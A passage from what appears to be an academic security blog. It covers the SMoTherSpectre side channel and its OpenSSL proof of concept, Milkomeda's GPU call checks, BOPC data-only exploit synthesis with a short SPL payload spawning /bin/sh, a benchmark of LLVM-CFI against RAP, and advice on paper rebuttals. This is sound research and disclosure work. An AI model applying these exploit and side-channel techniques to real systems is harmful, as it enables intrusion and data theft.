mark:
 ror
 ror
 ...

An attacker running a sequence of crc32 instructions will contend on port 1 if the victim branch falls though and runs crc32 instructions too. The slowdown due to contention can be detected by the attacker, using rdtsc timestamps to count the number of cycles taken to run its sequence, and allows it to infer that the victim's secret is not less than 0.

Gadgets

SMoTherSpectre requires two gadgets in the victim code base:

A BTI gadget (to trigger speculation): C/C++ compilers typically use indirect call instructions to implement calls using function pointers/virtual-function calls in code which does not deploy repoline defences. OpenSSL's EVP library uses such a pointer to, e.g., encrypt/decrypt using the selected cipher.
i = ctx->cipher->do_cipher(ctx, out, in, inl);
Further, a secret argument may be held in registers. In the example above, register rdx holds a pointer to the secret plaintext being encrypted.
A SMoTher gadget (to leak the secret): Every conditional branch in a victim's binary is a potential SMoTher gadget. In fact, even unintended sequences which may be interpreted as a conditional jump can be used (similar to ROP). However, an attacker needs to be able to differentiate between the target and fallthrough sequences using port contention. It turns out that hundreds to thousands of such sequences exist in glibc (with different degrees of SMoTher-differentiability). The paper describes in more detail our methodology for finding and ranking SMoTher-gadgets.

The vast availability of SMoTher gadgets makes SMoTherSpectre such a powerful attack. While the first stage is similar to other speculative execution attacks, the side channel to leak information is different and more readily available than cache-based side channels. While each step leaks only one bit of information (the conditional branch that depends on the secret value was taken or not taken), SMoTher-gadgets are more readily available and can be combined the leak information.

Evaluation

We release the proof of concept code to enable other researchers to reproduce, evaluate, and assess this side channel. It uses the gadgets described above. Separate processes are used for the attacker and victim. Per iteration of the experiment, a randomly-generated bit (representing the victim's secret) is written by the victim process to a file, while the attacker writes its guess to another file. For each secret, we repeat the attack multiple times to allow the attacker to get multiple samples. Multiple samples allows the attacker to eliminate some of the noise that invariably creeps into a timing experiment at such fine granularity. We run 1,000 iterations and compare the files in post-processing to calculate the attacker's accuracy in guessing the secret.

The histogram of the attacker's timing for the crc32 sequence in the SMoTher phase shows separate plots for when the actual secret is zero or one. Specifically, the attacker's timing is the average over 9 runs with the same secret. This figure clearly shows that an attacker can use a threshold of 94 cycles to make a guess of the secret with high confidence.

Overall, our attacker was able to guess the secret with an accuracy from 60% (with one sample) to 98% (with 9 samples).

OpenSSL exploit

We also created a concept exploit for OpenSSL's (commit f1d49ed, dated 27-Nov-2018) high level EnVeloP (EVP) API. We modelled a victim program using OpenSSL to encrypt data. Specifically, the program calls EVP_EncryptUpdate to encrypt chunks of data. An indirect call in the function serves as our BTI gadget.

At the BTI gadget, the register rdx holds a pointer to the plaintext being encrypted (victim secret). A SMoTher-gadget from glibc is used, comparing the first byte in memory referenced by rdx against zero. In effect, this is leaking information about the first byte of the plaintext.

The distribution of the attacker's timing with different secret values are distinguishable by statistical tests such as Student's t-test, implying that an attacker which is able to run multiple encryption runs of the same plaintext can identify the secret.

Mitigation

Mitigating SMoTherSpectre is possible by mitigating the port contention side channel or the transient execution side channel (BTI in our PoC).

There are a range of mitigations for BTI (commonly known as Spectre v2 mitigations), including enabling the Single Thread Indirect Branch Predictors (STIBP) feature on Intel processors. We saw that microcode updates (https://downloadcenter.intel.com/search?keyword=linux+microcode) dated 2017-07-07 and after as published by Intel prevented BTI on our released PoC code. All security-critical userspace programs should be compiled with retpolines.

However, BTI is one of multiple avenues for influencing indirect branches (or returns) on victim processes. Newer Spectre variants continue to propose alternate methods for influencing branch speculation. Therefore, defense against SMoTher is required to fully mitigate this transient execution attack.

The general idea of preventing SMoTher leaking information is to ensure that two threads with different privileges (in the general sense) do not compete for the same execution port. An obvious scenario is threads from separate users sharing a physical core. However, in certain cases, threads from the same Linux user can represent different mutually-untrusting entities. Therefore, the strongest defence is disabling simultaneous multi-threading.

Disclosure

We discovered the SMoTher side channel in June 2018 and developed the SMoTherSpectre speculative side channel proof of concept in November 2018. The co-authors at IBM Research disclosed the findings internally to IBM. We disclosed the vulnerability to Intel (on December 05, 2018) and to OpenSSL (on December 05, 2018). AMD was also notified as part of IBM's internal disclosure process. After the acknowledgement of receiving our PoC, we did not receive any feedback from Intel or OpenSSL. The IBM internal disclosure process completed on February 28, 2019 and we are releasing the details of the vulnerability on March 06, 2019.

The full paper is on arXiv. The PoC code enables reproduction. Contact: Mathias Payer or @gannimo on Twitter.

Milkomeda: colliding galaxies or how to repurpose security checks across domains

2019-01-02T16:18:00-05:00

On one hand, GPUs expose broad functionality for graphics and machine learning workloads, on the other hand, this functionality may be exploited due to large amounts of unvetted code, complex functionality, and the information gap between user-space application, kernel, and the auxiliary GPU. We introduce a novel framework that allows repurposing of WebGL security checks from the Chrome browser to protect the Android kernel against active exploitation from malicious apps at low performance overhead.

This post discusses the open-source release of our CCS'18 Milkomeda paper. This is joint work between Zhihao Yao, Saeed Mirzamohammadi, Ardalan Amiri Sani, and Mathias Payer.

New usage scenarios result in new threats

With the rise of machine learning workloads and modern games that require powerful computation, GPUs have become massively parallel computing co-processors that expose a complex and versatile interface. This complex interface enables the flexibility and performance required by modern workloads but increases the attack surface. Current operating systems do not enforce scheduling and privilege separation between different GPU workloads. The operating system simply exposes the interface to user-space programs, enabling them to use the vast functionality of the hardware at low overhead.

The intended usage scenario for GPUs is a user-space library that provides access to GPU functionality that then calls into the kernel driver which forwards the data to the GPU itself where the computation is executed. This scenario exposes bugs at three different locations. First, the user-space library may be buggy, crashing the calling process. Second, the kernel driver may be buggy, crashing the kernel (and all processes). Third, the code running on the GPU may be buggy, crashing the GPU (and all kernels currently running on the GPU). It's interesting to note that a user-space program is not restricted to the functionality exported by the user-space library but the (often only partially documented) functionality of the kernel driver.

The original threat model focused on local applications either running gaming workloads or machine learning workloads. These trusted workloads may crash if they are programmed incorrectly but there was no focus on a security angle. With the rise of graphics functionality in browsers, the threat model is changing. The exposed threat surface of the GPU kernel interface is exploited through several attacks against, e.g., Google Chrome where bugs in the GPU render process allow further privilege escalation.

WebGL: exposing `ioctl` to JavaScript

Recently, WebGL enables untrusted websites to access the OpenGL interface through JavaScript. While this is great news for JavaScript programmers that want to program 3D workloads, this is terrible news for security as a highly complex interface is now exposed to untrusted code.

("This is fine" comic by KC Green.)

Given the uncertain provenance of the code and the large amount of security vulnerabilities in user-space libraries and kernel drivers, the Google Chrome team deployed a safety net: an interposition layer that checks every GPU call before it is sent to the GPU. A local shim library forwards the GPU call to a separate process where the GPU state is replicated and the call is verified given the current GPU state. After passing the checks, the call is forwarded by the separate process to the GPU. While this adds some overhead due to the inter-process communication overhead (and the checks), it protects the kernel and the GPU from unvetted calls.

The figure above shows the Chrome WebGL security checks. WebGL calls are sent to the secure process where they are checked and then forwarded to the kernel.

These WebGL checks are limited along two dimensions. First, they are restricted to OpenGL calls and do not cover, e.g., the CUDA computational interface (due to both the massive additional complexity and the close-source nature of the computational interfaces). Second, they are incomplete. Due to the almost 1-1 mapping between OpenGL and WebGL, the amount of functionality is massive and checks are therefore reactive. The Chrome developers have added checks for frequently attacked interfaces or interfaces with certain bug patterns. The checks are continuously extended and improved, increasing the guarantees with every release.

Android GPU security

Android is exposed to similar issues as WebGL: untrusted applications ("apps") access the exposed GPU interface either through native libraries (hopefully the ones supplied by the Android systems) but may also access the native ioctl interface directly.

The figure above shows the default Android security stack: OpenGL (and other GPU calls) are never vetted and applications have direct access to the exposed interface.

The only reason why we did not yet see a large amount of local privilege escalation attacks against Android through the GPU interface is the combination of lack of knowledge about this interface and the availability of easier targets. With the deployment of new defenses on Android, the GPU interface will become a prime target.

Milkomeda: reuse checks

We decouple the GPU interface from user-space processes and force all interactions with the GPU through our interposition layer. The key idea of our system is to automatically reuse the WebGL checks from Chrome, extracting them dynamically and weaving them into our interposition layer. This allows us to reduce the cost of check development. Additionally, new checks will be imported automatically when they are added to Chrome, further reducing maintenance cost.

For WebGL, performance is less critical than for "native" Android applications. We therefore design and implement a safe area in the application process that executes the GPU checks. During regular execution, the safe area remains hidden. Through a call gate that is injected when GPU functionality is accessed, control-flow is transferred to this safe area. All safety critical arguments are copied into the safe area where they are checked. Non-safety critical arguments (as specified by the checks) can remain in the process and the checks can inspect them without additional overhead.

The figure above shows the Milkomeda layout: OpenGL calls are redirected to the safe area where they are vetted and checked before being forwarded to the kernel, protecting the Android system from potentially malicious applications at low performance overhead.

For more technical details and a discussion of design and implementation trade-offs, please refer to the ACM CCS'18 Milkomeda paper. We have also released the full source code of our Milkomeda implementation on GitHub, ready for reproduction of our results as well as future extensions!

Automating data-only attacks through Block Oriented Programming (BOP)

2018-12-31T13:40:00-05:00

With the rise of strong control-flow defenses such as Control-Flow Integrity (CFI), attackers will increasingly resort to data-only attacks that can be equally powerful. Earlier research demonstrated that data-only attacks can be as devastating as control-flow hijacking attacks. So far, constructing data-only attacks was cumbersome and required deep manual analysis. We introduce the idea of Block-Oriented Programming (BOP) where, based on a C-like programming language and the help of constraint solving, we automatically synthesize data-only exploits that run arbitrary payloads on host programs. The payloads are expressed as changes to the program state that can be injected into the program based on arbitrary read/write primitives. As input, BOP requires an exploit written in our C dialect, a host program, a location in the program with an arbitrary write primitive (i.e., the starting point of the exploit), and potentially the location of an arbitrary read primitive (i.e., to bypass ASLR). As output, our BOP compiler (BOPC) will produce (i) a set of program state modifications through the arbitrary write primitive to execute the program, (ii) prove that the exploit program is unsatisfiable, i.e., it cannot be synthesized on this program, or (iii) timeout.

We assume the host program is protected through common mitigations such as R^X, shadow stacks (or stack canaries), ASLR, and CFI. CFI is a strong stop the exploit defense that restricts the program's control flow to valid targets. While the control flow is guarded, the attacker is still free to make arbitrary changes to the program state. These program state changes allow the attacker to bend the control flow to unintended functionality. While CFI restricts execution to the program functionality, it does not restrict how this functionality is used. This gap allows the attacker to expose any functionality by bending control flow to that functionality and controlling its parameters. For example, an attacker may overwrite the is_admin variable to raise their privilege level. By corrupting program state, the attacker controls the targets of conditional branches, enabling them to reach unintended functionality. By corrupting function pointers with other valid targets (e.g., replacing a benign function pointer with another function pointer in the same equivalence set, for more details, check out the earlier CFI blog post) the attacker can stitch together different parts of the program.

SPL payload

Finding gadgets is already hard for regular ROP payloads but BOP payloads are orders of magnitude harder to find. We therefore introduce a programming language that allows an analyst to express BOP payloads in a high level language. On one hand, this increases the flexibility of the search as the language implements degrees of freedom that can be mapped to different constructs. On the other hand, the language simplifies the task of the analyst. We base our language on a C dialect that allows explicit use of virtual registers (every virtual register will be mapped to a machine register but the compiler may spill them or switch registers at arbitrary points during the payload execution).

An simple example of an execve payload is as follows:

void payload() {
  string prog = "/bin/sh\0";
  int64 * argv = { &prog, 0x0 };
  __r0 = &prog;
  __r1 = &argv;
  __r2 = 0;
  execve (__r0, __r1, __r2);
}

Given the SPL payload, BOPC translates each SPL statement into a set of constraints. These constraints are then mapped to code blocks in the host program.

Finding BOP gadgets

BOP adapts the concept of ROP (or JOP) in an environment where changes to the control flow are highly restricted. Classic code reuse techniques such as ROP and JOP assume that control flow can be arbitrarily redirected to attacker-controlled locations. For BOP, we assume that indirect control flow transfers (both function returns and indirect jumps/calls) are highly restricted to benign targets. To execute arbitrary computation on top of a host program, the attacker now needs to (a) find parts of the program that implement the desired behavior and (b) stitch these program locations together based on a valid path in the program. In the first task, the attacker finds gadgets in the program. In the second task, the attacker connects these gadgets through a path, carefully controlling all side effects along that path through program state adjustments. A final BOP gadget then consists of a functional part that executes the desired behavior and a dispatcher part that bends execution to the next gadget. The exploit must adjust all program state to correctly execute both the functional part and the dispatcher part.

Functional blocks

Given the constraints from an SPL program, our compiler searches for so called functional blocks, i.e., code blocks that implement or satisfy a certain SPL statement. In this step, all code blocks are marked. Each SPL statement is assigned a set of code blocks that could be used to implement the underlying functionality.

At this step, if any SPL statement has no corresponding functional block we will return unsat and inform the analyst which statement is unsatisfiable.

Dispatcher blocks

Given the candidate functional blocks, we try to synthesize paths between functional blocks. The process starts with two functional blocks where we try to find a path that has satisfiable constraints. This path is then extended to three, four, five statements, gradually extending the path until we have constructed the complete program. The underlying problem is NP hard and similar to symbolic execution, the success rate depends on the underlying heuristics and strategy of which functional blocks are chosen and where we start with the path construction. If successful, this step returns a path that executes the SPL payload on top of the host program.

The image above shows the path synthesis. Starting from the blue entry point, any selection of a functional gadget candidate restricts the feasible paths for the second gadget. While many candidates exist, synthesizing paths is hard due to the requirement of a satisfiable path from the gadget to the next.

Implementation and evaluation

Please refer to the BOPC paper or the BOPC presentation (in the GitHub repository) for more detail. To play with the code, check out the readme in the GitHub page. Also, for more information on related work, please refer to the related work section in the paper and to Data-oriented programming and Automatic Generation of Data-Oriented Exploits, two earlier works on the same topic that inspired BOPC.

In the paper, we evaluate BOPC using a set of 10 real programs with real exploits. We assume that they are protected with a strong forward edge CFI mechanism and a shadow stack on the backward edge. Using 13 SPL exploit payloads, we evaluate if BOPC can synthesize the payloads based on existing CVEs as entry points. The full evaluation is again in the paper. We focus on nginx as a case study and successfully synthesize execve, loops, and if-else conditions.

If-else condition on nginx that allows an SPL program to update state depending on a simple conditional.

Complex arbitrary loop that allows the SPL program to, e.g., continuously read or write data, a stepping stone for a generic information leak if, e.g., execve is not available.

As always, we release the full BOPC code on GitHub and we invite you to play with the tools. A longer readme on the GitHub page explains how you can run our SPL payloads, describes the language, and allows you to play with different programs.

Summary

BOPC enables fully-automatic (or mostly automatic) synthesis of data-flow payloads that execute arbitrary computation on top of existing programs. Exploits are encoded using a simplified C dialect and the path synthesis leverages several heuristics to tame the NP-hard problem. Go ahead and have fun with the code!

A journey on evaluating Control-Flow Integrity (CFI): LLVM-CFI versus RAP

2018-12-26T23:07:00-05:00

This post started out of the need to provide a little more clarification after a long and heated discussions on Twitter (initial discussion and follow up) about the origins of Control-Flow Integrity (CFI), the contributions of academia, and the precision, performance, and compatibility of different existing implementations.

CFI is a stop the exploit defense that protects the control-flow of processes in the presence of memory corruption. The threat model assumes that an attacker can modify (read, write, update) all of the address space according to the read/write permissions of the corresponding pages. The mitigation restricts execution to valid control flows by checking the targets of indirect control flow transfers (indirect calls and indirect jumps on the forward edge or function returns on the backward edge). While many different CFI proposals and implementations exist, most leverage a conceptual set check (e.g., checking a set hash or checking a set id) to test if the observed target is a valid target. Most CFI implementations are static, i.e., they rely on an analysis pass to build the target sets and, except for the target, do not need any writable data (that could be modified by the adversary) in the process.

Without memory corruption, only a single target is valid for each executed indirect control-flow transfer but due to the imprecision through the static CFI property, all targets in the set must be accepted (i.e., the implementations are neither context nor path sensitive). Similarly, due to imprecision in the analysis, the target sets are an over-approximation. In practice, most implementations use a type-based analysis and group all functions with the same prototype into a target set. These two imprecisions allow the attacker to replace the original target with another one from the target set without triggering the defense. The power of CFI as a mitigation is therefore tied to the size of the sets. Intuitively, the smaller the sets, the stronger the defense.

For the backward edge, a set check is insufficient due to the massive amount of over-approximation. In its most precise form, set checking leverages the function symbol to match the return sites for each call of that function. Most implementations similarly leverage the function prototype to match the return site. This means that from a void(*)(void) function you can return to after the call of any void(*)(void) function, often resulting in huge target sets. These over-approximations (both for function name and function prototype matching) result in an opportunity for the attacker to short-circuit different parts of the program. For example, two calls to printf in the same function allow the attacker to implement a loop where the return in the second call is overwritten to the first call. This shortcutting becomes a powerful primitive, often resulting in arbitrary computation (see Control-Flow Bending for details). To protect the backward edge, we therefore recommend stack integrity through a shadow stack or safe stack. Intel CET is a promising upcoming hardware implementation of a shadow stack and the LLVM shadow stack is a strong software implementation for aarch64.

We have extensively discussed CFI in an earlier blog post, a survey, and also as part of our BOPC, CFIXX, Kernel CFI, Control-Flow Bending, Lockdown, and CPI papers. For a quick overview, I recommend the blog post, for a deeper comparison, I recommend the survey.

History of taming control flow

Multiple sources claim ownership of the idea of restricting control-flow based on set checks. The original 2005 CFI paper coined the term control-flow integrity, formalized the property for forward and backward edge, and evaluated a prototype implementation (that was not released openly). The same authors revisited CFI in 2007 and proposed a shadow stack to protect return targets.

In 2003 PaXTeam wrote in their future ideas text file about protecting function pointers and returns. For function pointers (c1), they propose to make the function pointers themselves read-only. This approach would fundamentally solve the problem. Read-only function pointers are precise as an attacker can no longer overwrite the function pointer itself. This approach unfortunately does not scale due to transitivity: an attacker can still modify a pointer to the function pointer. Similar to how non-executable data pages did not prohibit ROP, read-only function pointers do not stop control-flow hijacking. Control-flow hijacking becomes harder as the attacker now must control an additional layer of indirection. For returns (c2), they propose a set check based on the function prototype, similar to the original CFI paper. Unfortunately, this idea was not implemented and the future ideas text file was not well known and therefore not cited in the Abadi CFI paper.

After we were made aware of this text file in about 2016, we started giving credit for the idea of restricting dynamic control flow. Given the very short description, exclusive focus on return for the control-flow check, and the lack of an implementation or evaluation, the future ideas file can serve as inspiration but does not provide a convincing case for CFI and should therefore not serve as the main citation for CFI. The PaX future ideas text file may be credited for the idea of restricting control-flow as a defense together with other related work from the same time such as program shepherding from 2002.

But as it turns out, the idea of taming control-flow is much older than PaX. Hoelzle, Chambers, and Ungar proposed the idea of polymorphic inline caches in 1991 that replaces indirect calls with a type check and a direct call, similar to the CFI set check. A type mismatch could be detected and result in termination of the program. Going back even further, Deutsch and Schiffman explored inline caches for Smalltalk-80 in 1984. (Thanks to Stefan Brunthaler for the references and discussion.)

The idea of taming indirect control flow is ancient with research in runtime systems, programming languages, hardware architectures, compilers, and defenses. This old legacy is rarely cited in the newer papers but may deserve a revisit. It may be worthwhile to start conducting computer science archaeology as academics regularly miss related work.

Evaluating CFI

The defense power of CFI is program dependent. Under the powerful attacker model, the usefulness of CFI depends on the question if the target set contains the necessary gadget(s) that are useful for the attacker. In addition to security, two other properties that can be evaluated are performance and compatibility. LLVM-CFI has negligible (less than 1%) performance overhead on standard benchmarks such as SPEC CPU2006 and we will not repeat the measurements here.

We evaluate LLVM-CFI (version 4.0.1) and RAP (via the 4.9.24-test7 patch), two CFI mechanisms that implement prototype-based set checks for the forward edge. RAP also offers prototype-based set checks on the backward edge but, due to the security concerns mentioned above, we will restrict the evaluation to the forward edge. Our tests focus on user-space code.

Using LLVM-CFI

LLVM-CFI is extremely easy to use. Install your favorite (recent) LLVM through your favorite package manager, e.g., through apt install clang-3.8 for the current Debian default. To activate LLVM-CFI runtime checking, simply compile your software with clang -flto -fsanitize=cfi test.c. There's also plenty of documentation available if you need to know more.

Using RAP

The story for RAP is a little more complicated and compiling the underlying GCC plugin is slightly more complicated (yes, this is sarcastic). The first challenge is to discover the actual source. The history behind RAP is a little obscure as no official write up or code repository exists. The only hints are @paxteam on twitter and a H2H presentation. Without an official release, I resorted to search the old PaX Linux patches as they apparently contained a "public" version of RAP. The most recent patch I found was pax-linux-4.9.24-test7.patch. Download the patch and apply it against the linux-4.9.24.tar.gz tarball. Enter the tarball and run make menuconfig to select a reasonable configuration. For some reason, the patch did not change Kconfig and the options for RAP did not show up. I therefore had to manually edit the .config file and make sure the following entries were selected:

CONFIG_HAVE_GCC_PLUGINS=y
CONFIG_GCC_PLUGINS=y
CONFIG_PAX_RAP=y

After selecting this configuration compile the plugin as a side effect of compiling the kernel through make. After the compilation finishes, you can grab the plugin from linux-4.9.24-pax/scripts/gcc-plugins/rap_plugin/rap_plugin.so and RAP is ready to use. If you know the command line arguments. As no documentation exists for RAP, I once again resorted to the code and discovered the following command line switches in the Makefiles:

CFLAGS=-DRAP_PLUGIN -fplugin-arg-rap_plugin-typecheck=call,ret
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-finish
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-ops
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-attr
CFLAGS+=-fplugin-arg-rap_plugin-report=func,fptr,abs
CFLAGS+=-DX86_RAP_CALL_VECTOR=0x82
CFLAGS+=-DX86_RAP_RET_VECTOR=0x83
CFLAGS+= '-fplugin-arg-rap_plugin-callabort=int $$0x82'
CFLAGS+= '-fplugin-arg-rap_plugin-retabort=int $$0x83'
CFLAGS+= -DRAP_PLUGIN

My educated guess is that the first line activates RAP for calls and returns while lines two, three, four activate higher precision depending on parts of the function prototype. The report switch on line five prints debug information about the hashes (and can be incredibly helpful to debug RAP). The remaining lines select how traps are handled. With this information, we are ready to use RAP for test software.

Getting to this stage required about 10-15 hours of software archaeology and pointers from @lazytyped, @raistolo, and @stevecheckoway who reached out to help after a heated discussion on Twitter.

Orthogonally, I received a lot of love from the Twitter "hacker" community, e.g., I now know that I'm a useless incompetent academic who is too stupid to read code and several other things that I was not aware of before. Thanks folks, I love you too! A core hacker aspect is to share information and to help, not to attack others who are trying to reproduce and understand.

Precision measurements

Precision is an important property for CFI. Strict CFI defenses may result in false positives where an execution of a program is stopped even without an attacker modifying memory. For example, if a function pointer is cast to a different type, dereferencing it may result in a CFI violation. LLVM-CFI enforces strict prototype checking and may therefore cause incompatibilities with existing code due to loose checks.

Both LLVM-CFI and RAP implement CFI checks based on function prototype matching, function prototypes are encoded to some type mask (in the case of RAP) or to some ID (for LLVM-CFI). Both policies detect if any aspect of the function prototype is changed, e.g., the type of a parameter or the return type. Both policies are precise and check for specific pointer types.

There is one key difference between RAP and LLVM-CFI: LLVM-CFI only allows calls to functions that are address-taken, i.e., only functions can be called indirectly that had their address taken through the address-of operator. Functions that are not address taken cannot be targets. The underlying idea behind this check is that only a small subset of all functions are called indirectly and LLVM-CFI reduces the size of their target sets this way (instead of all void(*)(void) functions only the void(*)(void) functions that have their address taken are in the set of valid targets. This vastly reduces the size of the sets. The power to distinguish between address-taken and not-address-taken functions comes at a price: LLVM-CFI requires -flto (link time optimization) to decide if a function is address taken anywhere in the program. RAP here trades precision for simplicity.

Both LLVM-CFI and RAP fail to detect a compromise of the function pointer if it is overwritten with an address-taken function. Note that this imprecision is expected from any type-based CFI mechanism.

To conclude, both LLVM-CFI and RAP implement CFI through type-based prototype matching. LLVM-CFI only matches address-taken functions while RAP matches all functions (resulting in some imprecision).

Performance

We run the performance test by indirectly dispatching a tiny function many times, then leveraging the rdtsc time stamp to count the number of cycles for each dispatch (including the execution of the function). We run the benchmark on a mobile Intel Core i7-7500 at 2.7GHz running the performance governor. We compile code with O3 and average 5 executions after one warmup. The dispatch code is:

__attribute__((noinline)) int quickfun(int a, int b) {
  __asm__ volatile("nop\n");
  return a*b;
}
...
int (*ptr)(int, int) = &quickfun;
__asm__ volatile ( "rdtsc" : "=a" (lo), "=d" (hi));
start = lo | (hi << 32);
for (unsigned long i =0; i < NRSPEED; i++)
  ptr(a, b);
__asm__ volatile ( "rdtsc" : "=a" (lo), "=d" (hi));
end = lo | (hi << 32);

Note that this microbenchmark only provides a very rough estimate of the performance for one kind of dispatch. As a microbenchmark, it tries to show worst case performance overhead for the protected dispatch.

Amazingly, RAP has no measureable performance overhead. Without RAP, gcc compiles the code to execute in 4.172 cycles per dispatch. With RAP, the same code executes in 4.173 cycles per dispatch. This is less than 0.04% overhead.

LLVM-CFI results in some overhead. Without CFI, LLVM compiles the code to execute in 4.179 cylces per dispatch. With LLVM-CFI, the code executes in 5.012 cycles per dispatch. This is about 19.93% overhead for a pure dispatch.

Let's dive into the compiled code to see where the overhead comes from. Let's start with RAP. The hot loop is compiled to:

2181: 0f 31                 rdtsc
2183: 48 c1 e2 20           shl    $0x20,%rdx
2187: bb 00 ca 9a 3b        mov    $0x3b9aca00,%ebx
218c: 48 09 c2              or     %rax,%rdx
218f: 49 89 d6              mov    %rdx,%r14
2192: 66 0f 1f 44 00 00     nopw   0x0(%rax,%rax,1)
2198: 48 81 7d f8 a8 2f bd  cmpq   $0x17bd2fa8,-0x8(%rbp)
219f: 17
21a0: 75 61                 jne    2203 <speedfun+0x93>
21a2: 44 89 e6              mov    %r12d,%esi
21a5: 44 89 ef              mov    %r13d,%edi
21a8: ff d5                 callq  *%rbp
21aa: 48 83 eb 01           sub    $0x1,%rbx
21ae: 75 e8                 jne    2198 <speedfun+0x28>
21b0: 0f 31                 rdtsc

We see how the type check is executed in each loop through the cmpq instruction, dispatching after a successful comparison. The target in *%rbp directly points to the function quickfun.

LLVM-CFI reshuffles code quite a bit. The hot loop is compiled to:

4013cc: 0f 31                 rdtsc
4013ce: 49 89 d6              mov    %rdx,%r14
4013d1: b9 18 15 40 00        mov    $0x401518,%ecx
4013d6: 49 39 cc              cmp    %rcx,%r12
4013d9: 75 79                 jne    401454 <main+0x244>
4013db: 49 c1 e6 20           shl    $0x20,%r14
4013df: 49 09 c6              or     %rax,%r14
4013e2: bb 00 ca 9a 3b        mov    $0x3b9aca00,%ebx
4013e7: 66 0f 1f 84 00 00 00  nopw   0x0(%rax,%rax,1)
4013ee: 00 00
4013f0: 44 89 ff              mov    %r15d,%edi
4013f3: 89 ee                 mov    %ebp,%esi
4013f5: 41 ff d4              callq  *%r12
4013f8: 48 ff cb              dec    %rbx
4013fb: 75 f3                 jne    4013f0 <main+0x1e0>
4013fd: 0f 31                 rdtsc

Interestingly, the check itself is hoisted outside of the loop. The target 0x401518 contains a single jump to the real implementation of quickfun.

0000000000401518 <quickfun>:
401518: e9 03 fc ff ff        jmpq   401120 <quickfun.cfi>
40151d: cc                    int3
40151e: cc                    int3
40151f: cc                    int3

LLVM-CFI implements the CFI check as a range check that maps into a table of trampolines. All address taken functions of the same type are translated into a range where they are placed next to each other. A CFI dispatch is then matched into a jump into an 8-byte aligned jump into the area of targets for the corresponding type. This indirection results in a 1 cycle penalty for each dispatch due to the double indirection.

Given this simple measurement on a single CPU, the RAP-style instrumentation is about 1 cycle per dispatch faster than the LLVM-CFI based one. The LLVM-CFI instrumentation has the advantage that all valid targets are tightly encoded in a single table, potentially helping a reverse engineer. There is no reason why LLVM-CFI could not implement simple prototype-based checking that is encoded inline next to the function as proposed in the original CFI paper.

Summary

In summary, in the current implementations, RAP is slightly faster due to direct encoding of target sets but LLVM-CFI is more precise by limiting indirect dispatch to only address-taken functions. Both mechanisms implement a prototype-based CFI policy.

Just looking at how easy it is to run LLVM-CFI and how complicated it is to run RAP, I don't think any reasonable person would use RAP in their code due to concerns about compatibility and long term maintainability as it is not clear if or how RAP will be supported in the future. Also, I have no way of knowing how complete the RAP plugin is or if it is even the most recent version as PaXteam turned closed-source and no longer openly shares the plugin (but offered to run my tests on his machine).

I wonder why LLVM-CFI relies on a trampoline table to dispatch targets but does not prepend each function with a type identifier. The double indirection for LLVM-CFI seems excessive and unneeded.

Get the full code for the benchmark and play with it yourself

Edits, corrections, and updates

The blog post initially claimed that there may be a TOCTTOU window against RAP. This was a mistake that happened when reading the assembly.

Added a note about the microbenchmark results.

How not to alienate your reviewers, aka writing a decent rebuttal

2018-07-04T18:31:00-04:00

Assuming you have given everything to write the best and most beautiful paper you can ever create, it is obvious that the reviewers must see your points and therefore write you a favorable review with a recommendation of strong accept. Unfortunately, this is not always the case and reviewers may miss some points or misunderstand some of your contributions.

Many conferences have therefore introduced a rebuttal phase that allows authors to respond to the (initial) set of reviews. The rebuttal is an opportunity to clarify misunderstandings, answer questions the reviewers may have, or to expand on a given point the reviewers complained about. There are many different forms of rebuttals with slight twists. Generally, a rebuttal allows you to discuss and clarify certain aspects in a review but it is not intended to add new material, so keep it short and focused.

Reviewing generally is not an adversarial setting and most reviewers are not against you or against your research. Due to the increasing review burden, some reviews may end up being on the short end or not as deep as you would have wanted. The rebuttal is not the time to complain about such reviews. As mentioned above, the rebuttal serves the purpose to clarify and to respond to the reviews. If you must complain about the reviews themselves, consider taking it up with the PC chairs.

Over time, I've settled on the following three step process to write rebuttals, which helps me work through the reviews and to extract the points reviewers raised. I encourage my students to always write rebuttals even if a conference is not using a rebuttal process. Rebuttals allow you to digest reviews and to reflect on your paper from the reviewer's point of view, hopefully identifying the weaknesses and, if the paper is not accepted, improve the paper for the next submission.

Read the reviews

Reading reviews is an art. It is incredibly difficult to read between the lines. Try to identify what annoyed the reviewer: where did they stop paying attention? What is, according to their view, the main issue with the paper? What are the shortcomings? Additionally, try to figure out what they liked and what they think the strength of the paper is. Great reviews also contain a section that highlights the path to acceptance, i.e., what the reviewer thinks needs to change to get the paper accepted. If no such section is present, try to identify what would have helped swing the reviewer in your favor.

Reading reviews can be disturbing. You may ask yourself why reviewers did not get a certain point as it was clearly discussed in the paper. After going through the reviews, it is best to take some time off to digest the reviews, allowing you to regain your objectivity.

Extract the main criticisms, group, and rank

Start marking the main criticisms in the paper. Pay attention to the topics identified in the first phase and highlight them. Scribble over the reviews to highlight individual comments. In this second phase your goal is to identify the main topics that need to be addressed. Creating an outline of these main points can be helpful. As you are working through the reviews again and again, start grouping the comments of individual reviewers based on topics, and then rank the topics according to importance. If multiple reviewers brought up the same points it may be crucial to clarify that aspect.

An interesting question that often pops up is what aspects a rebuttal should focus on. Should the ranking be purely technical, according to reviewer expertise, or according to the review score? For example, is it better to convince a non-expert weak accept to bump up their score or to clarify some issues that an expert raised? I've heard many different approaches and each approach has pros/cons. Also, having seen the process from the other side as a reviewer, I cannot say if any given approach has advantages. In my rebuttals I generally try to address the technical points, not focusing on individual reviewers or experts too much. If an expert is strongly polarizing, it may be worthwhile to highlight some misunderstanding or to keep the discussion of that review short. But these issues quickly evolve into politics and may be for people with more social skills.

The key issue you want to likely avoid is alienating reviewers. Keep sarcasm, irony, and other subtle forms of communication out of your rebuttal and stick to technical facts. Try to clarify technical items and write in a way that gives reviewers a way out to adjust their scores for the better. I.e., instead of writing "reviewer A is a moron who ignored our section 2.1 where we clearly describe the design of our Flubb system" write something along the lines: "In section 2.1 we describe how Flubb satisfies the Blubb assumption. We will clarify these constraints based on reviewer A's feedback." If a reviewer takes the time to note a certain point as part of their review then they felt that this was an issue and it is the author's job to clarify that issue. The reviewer is not wrong but may have been misguided by the paper. Improving your writing will make it easier for the reviewer to digest your points.

Formulating a response

